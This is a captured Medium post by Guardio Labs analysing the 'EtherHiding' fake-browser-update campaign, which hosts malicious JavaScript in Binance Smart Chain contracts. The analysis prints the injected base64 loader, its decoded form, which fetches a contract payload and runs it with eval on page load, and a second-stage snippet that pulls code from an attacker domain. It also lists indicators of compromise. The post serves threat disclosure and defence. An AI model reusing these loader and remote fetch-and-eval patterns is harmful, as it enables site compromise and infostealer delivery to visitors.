labs.guard.io Open in urlscan Pro
162.159.152.4  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Open in app

Sign up

Sign In

Write


Sign up

Sign In




“ETHERHIDING” — HIDING WEB2 MALICIOUS CODE IN WEB3 SMART CONTRACTS

Guardio

·

Follow

9 min read
·
2 days ago

6



Listen

Share

By Nati Tal, Oleg Zaytsev (Guardio Labs)

> “EtherHiding” presents a novel twist on serving malicious code by utilizing
> Binance’s Smart Chain contracts to host parts of a malicious code chain in
> what is the next level of Bullet-Proof Hosting.
> 
> Over the last two months, leveraging a vast array of hijacked WordPress sites,
> this threat actor has misled users into downloading malicious fake “browser
> updates”. While their initial method of hosting code on abused Cloudflare
> Worker hosts was taken down, they’ve quickly pivoted to take advantage of the
> decentralized, anonymous, and public nature of blockchain. This campaign is up
> and harder than ever to detect and take down.
> 
> Dive into our analysis to grasp this game-changing technique that might just
> transcend standard phishing and malware campaigns.


THE EVOLVING FAKE BROWSER UPDATE CAMPAIGN

In the last 2 months or so, we have been facing yet another “fake-update”
malware propagation campaign. In the attack flow, a site is defaced with a very
believable overlay demanding a browser update before the site can be accessed.
The fake “update” turns out to be vicious infostealer malware like RedLine,
Amadey, or Lumma.


The compromised Softoniclabs WordPress-based site, defaced to propagate malware

This campaign, named “ClearFake”, identified by Randy McEoin, begins its attack
on compromised WordPress sites where attackers embed a concealed JS code. This
initial “bridgehead” code is injected into article pages and retrieves a
second-stage payload from a server controlled by the attackers, which then
carries out the rest of the site defacement.



Using this method, the attacker can remotely and instantly modify the infection
process and display any message they want. It can change tactics, update blocked
domains, and switch out detected payloads without re-accessing the WordPress
sites. In the case of ‘ClearFake’, the second-stage code was hosted on
Cloudflare Workers. This was effective until CloudFlare blocked those accounts,
potentially halting the entire campaign.

Yet, in this evolution of “ClearFake”, we see that threat actors have introduced
a novel method of hosting malicious code both anonymously and without any
limitations — a real “Bullet Proof” hosting facilitated by the Blockchain.


NO CRYPTOSCAMS HERE, SO WHY BINANCE?

The new infection process, at first glance, is the same as before — using the
same domains and IP addresses, yet on the first entry of the compromised
WordPress site we see new unfamiliar network traffic directed to
Binance-controlled servers. What does Binance, one of the world’s largest
cryptocurrency exchanges, have to do with it all? Well, let’s examine the new
variant of the first stage code:

<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
<script src="data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlcj1uZXcgZXRoZXJz
LnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd
[......]b2FkOw=="></script>

The two script tags described above are the means by which threat actors take
over an entire WordPress site. Attackers insert this code into the primary
template of a WordPress site, often exploiting vulnerable plugins (e.g. Balada
Injector), outdated WordPress versions, or using stolen site credentials
acquired from the dark web.

The code above is just Base64 obfuscated, translated to the following being
executed on every page loaded from the compromised site:

// include <https://cdn.ethers.io/lib/ethers-5.2.umd.min.js>
async function load() {
    let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
        signer = provider.getSigner(),
        address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
        ABI = [
            { inputs: [{ internalType: "string", .......},
            { inputs: [], name: "get", ......},
            { inputs: [], name: "link", ....... },
        ],
        contract = new ethers.Contract(address, ABI, provider),
        link = await contract.get();
    eval(atob(link));
}
window.onload = load;

This part of the malicious code queries the BSC BlockChain. It creates a new
contract instance by initializing it with the provided, attacker-controlled,
blockchain address. It also provides the ABI (Application Binary Interface) that
declares the contract’s functions and structure. The function that is called is
get(), and it will basically query the contract to return a specified payload to
be later decoded and evaluated as JavaScript code with the eval() function.


The attack flow — from querying the BlockChain to total site defacing and
malware download


SMART CONTRACTS? CODE ON THE BLOCKCHAIN?

OK wait… what is this BSC? And what are those contracts anyhow?

BSC, or Binance Smart Chain, launched three years ago, is Binance’s answer to
Ethereum, designed to run decentralized apps and “smart contracts” more
efficiently. While Ethereum is a publicly owned blockchain with cryptocurrency
and contracts capabilities, BSC is owned by Binance and focuses on contracts:
coded agreements that execute actions automatically when certain conditions are
met. These contracts offer innovative ways to build applications and processes.
Due to the publicly accessible and unchangeable nature of the blockchain, code
can be hosted “on-chain” without the ability for a takedown.

This is what we see here in this attack — malicious code is hosted and served in
a manner that can’t be blocked. Unlike hosting it on a Cloudflare Worker service
as was mitigated on the earlier variant. Truly, it is a double-edged sword in
decentralized tech.


THE MALICIOUS SMART CONTRACT — ANALYZED

We can’t see the actual code used to compile this contract, yet we do have
access to its bytecode (decentralized and transparent after all). Once
decompiled we can see its simple functionality in action:

def storage:
  stor0 is array of struct at storage 0

def update(string _newName) payable: 
  require calldata.size - 4 >= 32
  require _newName <= -1
  require _newName + 35 < calldata.size
  if _newName.length > -1:
      revert with 'NH{q', 65
  require _newName + _newName.length + 36 <= calldata.size
  if bool(stor0.length):
      if bool(stor0.length) == stor0.length.field_1 < 32:
          revert with 'NH{q', 34
      if _newName.length:
          stor0[].field_0 = Array(len=_newName.length, data=_newName[all])
  else:
  {...}

def get() payable: 
  if bool(stor0.length):
      if bool(stor0.length) == stor0.length.field_1 < 32:
          revert with 'NH{q', 34
          {..}
          if stor0.length.field_1:
              if 31 < stor0.length.field_1:
                  mem[128] = uint256(stor0.field_0)
                  idx = 128
                  s = 0
                  while stor0.length.field_1 + 96 > idx:
                      mem[idx + 32] = stor0[s].field_256
                      idx = idx + 32
                      s = s + 1
                      continue 
                  return Array(len=2 * Mask(256, -1, stor0.length.field_1), data=mem[128 len ceil32(stor0.length.field_1)])
              mem[128] = 256 * stor0.length.field_8
      else:
         {...}
  return Array(len=stor0.length % 128, data=mem[128 len ceil32(stor0.length.field_1)], mem[(2 * ceil32(stor0.length.field_1)) + 192 len 2 * ceil32(stor0.length.field_1)]), 

def unknown1c4695f4() payable: 
 {...}

This is a simple contract app that uses the storage function of the contract
(the array variable stor0). The method update() saves the input to this storage
— byte by byte and the method get() reads the storage and returns its value as a
string. That way, by interacting with the contract, data can be written or
updated on the chain.

We can see this in the transactions history on the BSC, starting on contract
creation on the 9th of September 2023 by another attacker-controlled address.
That other address, created in late June 2022, was loaded with BNB (The Binance
Coin) in an amount just enough to create and update the contract — activities
that are not actually payable, yet do cost some minor customary “gas” fees
(between 0.02 to 0.60 USD each):


Attacker-controlled BSC addresses — from funding, contract creation, and ongoing
code updates

Only the first update of the contract is clearly a test (as it actually included
only the string “test”) but all the following are obvious pieces of JavaScript
code. When the first entries are quite simple, the latter add more JavaScript
obfuscation techniques but keep on doing just the same few simple activities as
seen in this first entry (after decoding from Base64):

const get_k_script = () => {
    let e = new XMLHttpRequest();
    return e.open("GET", "https://921hapudyqwdvy[.]com/vvmd54/", !1), e.send(null), e.responseText;
};
eval(get_k_script());

This is exactly the same code we’ve seen on earlier variants of ClearFake (as
returned from the CloudFlare service), only the second stage domain is being
changed on an almost daily basis — this shows how easy it is to update the
entire attack chain with a simple blockchain transaction.

We see that each time their domain is “burned” an update to the chain is issued
to swap the malicious code and affiliated domains — at least 30 malicious
domains and counting.


DEPLOYING MALICIOUS CODE FROM THE BLOCKCHAIN (FOR FREE!)

Getting back to the attack flow, once the first stage code on the compromised
WordPress site loads, it calls the Binance’s SDK eth_call method on the
BlockChain and fetches the malicious JavaScript code above.

eth_call is a read-only and cost-free operation, originally designed to simulate
contract execution for reading data or testing without any real-world impact. As
such, it is not even recorded on the blockchain. So you get a free, untracked,
and robust way to get your data (the malicious payload) without leaving traces.
As an example, the compromised website makes your browser broadcast this JSON
RPC command to the chain:

{
  "method": "eth_call",
  "params": [
    {
      "to": "0x7f36d9292e7c70a204facc2d255475a861487c60",
      "data": "0x6d4ce63c"
    },
    "latest"
  ],
  "id": 44,
  "jsonrpc": "2.0"
}

And getting back the following response (truncated for display):

{
    "jsonrpc": "2.0",
    "id": 44,
    "result": "0x000000[..]00000e385a6e56755933527062323467624368594c4[........]"
}

The resulting payload is a binary-coded string, exactly the one that was pushed
to that contract using the update() method just a day before. It includes the
latest second-stage domain address, which is being queried to get yet another
payload to evaluate and execute on your browser.

Note that this second stage domain is hosted on the same Russian-based IP
address and follows the attack flow of the earlier ClearFake variant. The action
is of defacing the site with a quite advanced and well-designed deceptive
overlay page — localized and customized per almost all popular browsers in use:


ClearFake’s deceptive browser update notices


FIGHTING BACK? IS IT EVEN POSSIBLE?

Well, there are inherent challenges in mitigating this kind of abuse due to the
decentralized nature of blockchain systems.

Once a smart contract is deployed on BSC, it operates autonomously. Binance
can’t just “shut it down.” The only thing they can do and currently offer — is
the ability of the community and developers to be warned about a contract if
identified as malicious or part of an illegal activity. How? Well, it is being
tagged on the official BSCScan service as such:


BscScan — Binance’s official BSC explorer showing Fake and Malicious tags

Indeed, the address used to deliver the malicious code was clearly marked as
“Fake_Phishing2561”. Is this enough? Hardly. As this is not an address used in
any financial or other activity that victims can be lured to transfer funds or
any other kind of Intellectual property to — visitors of compromised WordPress
sites have no clue as to what is going on under the hood. This contract, tagged
as Fake Malicious or whatnot, is still online and delivers the malicious payload
— apparently, as of today, there is NO WAY TO STOP IT.


“ETHERHIDING”- EVEN MORE THREATNING POSSIBILITIES

A critical point of intervention to halt such campaigns lies in understanding
why WordPress sites are so vulnerable and frequently compromised, as they serve
as primary gateways for these threats to reach a vast pool of victims. To
protect your site and, eventually, all your visitors, you should always keep
your WordPress infra and plugins updated, safeguarding credentials, using
robust, periodically-changed passwords and just keeping an eye on what is
happening in your site!

And back to the big picture. Traditionally, many malicious campaigns are
curtailed by blocking domains, and IPs, or issuing abuse reports to providers.
Financially crippling these perpetrators often becomes the final resort.
However, the advent of blockchain, as demonstrated by “EtherHiding”, ushers in
new challenges.

Beyond this specific exploit, blockchain can be misused in myriad ways, from
malware propagation stages to data exfiltration of stolen credentials and files,
all eluding traditional law enforcement shutdown methods.

While Web 3.0 heralds innovation, malicious actors continually adapt, leveraging
its benefits for nefarious gains. As for Binance, We can’t really blame them, as
the data is free for all and everyone can check and detect misuse — but hey, why
won’t Binance just disable any query to already tagged as “Malicious” addresses?
Or at least let’s disable this eth_call debug method for unvalidated contracts?


IOCS

Related BSC Addresses/Contracts:
-----------------------------------
0xfc1fE66FB63c542A3e4D45305DaB196E5EcA222A
0x7f36D9292e7c70A204faCC2d255475A861487c60


3ed Stage IP Addresses:
-----------------------
109[.]248[.]206[.]49


3rd Stage Attacker Controlled Domains:
--------------------------------------
921hapudyqwdvy[.]com
98ygdjhdvuhj[.]com
boiibzqmk12j[.]com
bookchrono8273[.]com
bpjoieohzmhegwegmmuew[.]online
cczqyvuy812jdy[.]com
indogevro22tevra[.]com
ioiubby73b1n[.]com
kjniuby621edoo[.]com
lminoeubybyvq[.]com
nbvyrxry216vy[.]com
nmbvcxzasedrt[.]com
oekofkkfkoeefkefbnhgtrq[.]space
oiouhvtybh291[.]com
oiuugyfytvgb22h[.]com
oiuytyfvq621mb[.]org
ojhggnfbcy62[.]com
opkfijuifbuyynyny[.]com
pklkknj89bygvczvi[.]com
poqwjoemqzmemzgqegzqzf[.]online
pwwqkppwqkezqer[.]site
reedx51mut[.]com
sioaiuhsdguywqgyuhuiqw[.]org
ug62r67uiijo2[.]com
vcrwtttywuuidqioppn1[.]com
vvooowkdqddcqcqcdqggggl[.]site
ytntf5hvtn2vgcxxq[.]com
zasexdrc13ftvg[.]com
ziucsugcbfyfbyccbasy[.]com


Compromised WordPress Sites (Detected Last 14 Days):
----------------------------------------------------
kprofiles[.]com
animexin[.]vip
coloredmanga[.]com
gayvidsclub[.]com
dailyangelprayers[.]net
healthella[.]com
techsprobe[.]com
avionprivat[.]ro
..
..
..
--> 510 More Domains Here --> https://pastebin.com/x23iWvix


Malware Hashes (samples):
------------------------------------
d0c56875fb19a407a86292e35dffec6caabbdbf630fbb79de4eec04708fa7b66
37bba90d20e429ce3fd56847e4e7aaf83c62fdd70a7dbdcd35b6f2569d47d533
b029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f
1a99ac759fcd881729b76c2904476b4201e794df2d0547c954ea37be7c153131
633124ed8d7af6dd22722ee43abfe9b0ad97798a1d48b951abdc1ad88e83c702
3db1afee107cf2fa57d13e60c13c87dd1c22bfa9ef23dcf369d52dd9807a5ff4
1743f4a392b6d2ad0d47a7a57e277e1a29ecf459275b604919a6131739afdaad
788567d3cc693dd5d0dada9f4e1421755c1d74257544ba12b502f085a620585e
3d77b34ba6dbb49d594e2be590a87f682e1875d2565ff18bdeafc66c9d5594ea
80f05865e59ec4e12e504adbf5fae3d706b5d27e5ab2fc52fcd0feb19365c7b0
e041b3eaaed1c0ad37e7f91717ee5b0e12e922b67bbe1e69a4c68c80baf22b4f
8ba53b5d773bc157df65fb0941c24e1edbc7c7b47e37b3f7a01751fc3b1a701a
2ab315537510fc91d73825d0d6661e9f4b141799877e2f5159892886265f362e

Malware Filename samples (Note UNICODE abuse in filenames):
--------------------
ChrоmеSеtuр.appx
ChrоmеSеtuр.exe
СhrоmеSеtup.exe
ChrоmеSеtuр.msi
MlсrоsоftЕdgеSеtup.appx
MlсrоsоftЕdgеSеtup.exe
MlсrоsоftЕdgеSеtup.msi
MlсrоsоftЕdgеSеtup.msix
Setup_win64_2.49.0.4_release.exe
Setup_win64_5.49.1031-release.exe





SIGN UP TO DISCOVER HUMAN STORIES THAT DEEPEN YOUR UNDERSTANDING OF THE WORLD.


FREE



Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.


Sign up for free


MEMBERSHIP



Access the best member-only stories.

Support independent authors.

Listen to audio narrations.

Read offline.

Join the Partner Program and earn for your writing.


Try for $5/month
Cybersecurity
Blockchain
WordPress
Malware
Web Research


6

6



Follow



WRITTEN BY GUARDIO

486 Followers

Keeping your online identity and information secure on every corner of the web.
#SafeBrowsing Learn more at https://guard.io

Follow




MORE FROM GUARDIO

Guardio


“MRTONYSCAM” — BOTNET OF FACEBOOK USERS LAUNCH HIGH-INTENT MESSENGER PHISHING
ATTACK ON BUSINESS…


BY OLEG ZAYTSEV (GUARDIO LABS)

10 min read·Sep 10

1





Guardio


“PHISHFORCE” — VULNERABILITY UNCOVERED IN SALESFORCE’S EMAIL SERVICES EXPLOITED
FOR PHISHING…


BY OLEG ZAYTSEV, NATI TAL (GUARDIO LABS)

10 min read·Aug 2

104

1




Guardio


“FAKEGPT”: NEW VARIANT OF FAKE-CHATGPT CHROME EXTENSION STEALING FACEBOOK AD
ACCOUNTS WITH…


BY NATI TAL (GUARDIO LABS)

9 min read·Mar 8

121

4




Guardio


“MALVERPOSTING” — WITH OVER 500K ESTIMATED INFECTIONS, FACEBOOK ADS FUEL THIS
EVOLVING STEALER…


BY NATI TAL (GUARDIO LABS)

11 min read·Apr 26

2

1



See all from Guardio



RECOMMENDED FROM MEDIUM

Parkerzanta


EARN MONEY WITH FUN! FIND VULNERABILITY IN RANDOM SITES


THIS ARTICLE I WILL TELL YOU ABOUT HOW I MAKE MONEY FROM SITES THAT DO NOT HAVE
A BUG BOUNTY PROGRAM, BECAUSE I THINK THIS IS VERY…

5 min read·6 days ago

157

1




Pratik Dabhi


WEB APPLICATION VULNERABILITIES: CRLF INJECTION AND BEYOND

4 min read·4 days ago

56






LISTS


MODERN MARKETING

34 stories·187 saves


MY KIND OF MEDIUM (ALL-TIME FAVES)

43 stories·92 saves


Ghazi Khan

in

Cubed


BUILDING WEB3 APPLICATIONS WITH NEXTJS, SOLIDITY, AND TRUFFLE


WEB3 DEVELOPMENT IS BECOMING INCREASINGLY POPULAR AS MORE AND MORE APPLICATIONS
ARE BEING BUILT ON BLOCKCHAIN TECHNOLOGY. IN THIS BLOG…

5 min read·May 15

53

1




Mohammed Waleed


HOW I FOUND TWO API VULNERABILITIES BY ANALYZING JS SOURCE CODE


HELLO EVERYBODY, MY NAME IS MOHAMMED WALEED, I’M A BEGINNER BUG HUNTER AND WEB
DEVELOPER AND TODAY I WILL SHARE WITH YOU HOW I FOUND TWO…

4 min read·Jul 27

567

9




Alvaro Balada


BURPSUITE VS CAIDO: WHY YOU SHOULD GIVE CAIDO A TRY


IN MY OFFENSIVE SECURITY JOURNEY, I HAVE ALWAYS USED BURPSUITECOMMUNITY AS MY
MAIN AND UNIQUE PROXY TOOL, I TRIED TOOLS LIKE OWASP ZAP, BUT…

4 min read·Sep 29

41





Isaac Saul


A PERSONAL, NON-PARTISAN PERSPECTIVE ON THE ISRAEL-HAMAS WAR


TO UNDERSTAND THIS WAR, WE MUST UNDERSTAND THE THOUSAND-YEAR HISTORY THAT LED US
HERE

11 min read·3 days ago

9.5K

276



See more recommendations

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams

To make Medium work, we log user data. By using Medium, you agree to our Privacy
Policy, including cookie policy.